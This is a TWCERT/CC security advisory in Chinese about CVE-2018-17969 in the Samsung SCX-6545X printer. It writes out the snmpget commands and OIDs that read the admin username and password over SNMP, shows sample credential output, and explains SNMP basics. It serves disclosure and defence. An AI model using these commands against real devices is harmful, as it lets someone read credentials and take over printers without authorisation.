按 Enter 到主內容區
:::

TWCERT-電子報

:::

慎防SNMP指令,能撈取Samsung SCX-6545X管理者帳密

發布日期:
字型大小:
  • 發布單位:TWCERT/CC
  • 更新日期:2019-04-03
  • 點閱次數:743
慎防SNMP指令,能撈取Samsung SCX-6545X管理者帳密

CVE編號

CVE-2018-17969

內文

●概述:
三星公司印表機產品Samsung SCX-6545X,經測試披露出高風險漏洞,儘管其web介面設計具備身分驗證階段,但遠端駭客無須嘗試破解,僅賴簡單網路管理協定(SNMP),透過相關指令與OID參數(snmpget -v 1 -c public 100.100.100.100 iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0),逕對目標設備IP發送請求,即可獲得系統資訊,包含管理者帳密,攻擊該破綻之複雜度甚低,亦免身分權限,可輕易取得帳密並管理印表機,CVSS 3.0評分7.5,目前暫無官方安全更新,建議企業網管部門以防火牆攔阻可疑SNMP封包。
Samsung更新。
●編註:
(1)SNMP應用簡介
簡單網路管理協定(SNMP:Simple Network Management Protocol) 支援網路管理系統,構成Internet協定家族的一員,能監測網路裝置,包含應用層協定(application layer protocol)、資料庫模式(database schema)、資料物件。
SNMP的管理信息庫(MIB)採用樹型資料結構,類似DNS,故稱物件命名樹(objectnamingtree),且樹狀結構透過物件識別碼Object Identifier(OID),表示唯一識別符號,objectnamingtree頂級對象有三個,即ISO、ITU-T和該兩組織的聯合體,ISO下層有4個node,如iso.org.dod.internet,其對應OID即是1.3.6.1。
而SNMP協定有多種指令與參數組合,以「snmpget -c public -v 2c host_ip oid」為例,功用是取得單筆系統資訊,範例:
root@dns:~# snmpget -c public -v 2c localhost 1.3.6.1.2.1.1.1.0
iso.3.6.1.2.1.1.1.0 = STRING: "Linux yh 3.0.0-19-generic #32-Ubuntu SMP Thu Apr 5 18:22:38 UTC 2012 x86_64"
(2)探勘實務
攻擊者從遠端操縱SNMP request,搭配特定OID參數,可以套取Samsung SCX-6545X印表機V2.00.03.01 03-23-2012版之系統資訊,最為嚴重者,是直接獲得短禮者帳密明文資料,指令示範如下:
∵snmpget指令配賦參數iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0
$ snmpget -v 1 -c public 100.100.100.100 iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0
∴得知帳號"admin"
> iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0 = STRING: "admin"

∵snmpget指令配賦參數iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0
$ snmpget -v 1 -c public 100.100.100.100 iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0
∴得知密碼"1111"
> iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0 = STRING: "1111"

影響產品

Samsung SCX-6545X V2.00.03.01

解決辦法

暫無官方更新,建議網管設定防火牆攔截snmpget指令。
回頁首